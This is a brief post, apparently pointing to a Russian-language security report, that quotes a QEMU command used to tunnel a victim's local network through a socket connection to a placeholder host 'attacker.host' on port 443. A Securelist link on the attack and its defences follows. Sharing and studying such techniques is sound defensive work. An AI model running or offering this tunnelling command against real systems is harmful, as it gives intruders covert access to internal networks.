qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off -netdev socket,id=sock,connect=attacker.host:443 -netdev hubport,id=port-lan,hubid=0,netdev=lan -netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic
Подробный отчёт об этой атаке и методах защиты:
https://securelist.ru/network-tunneling-with-qemu/108838/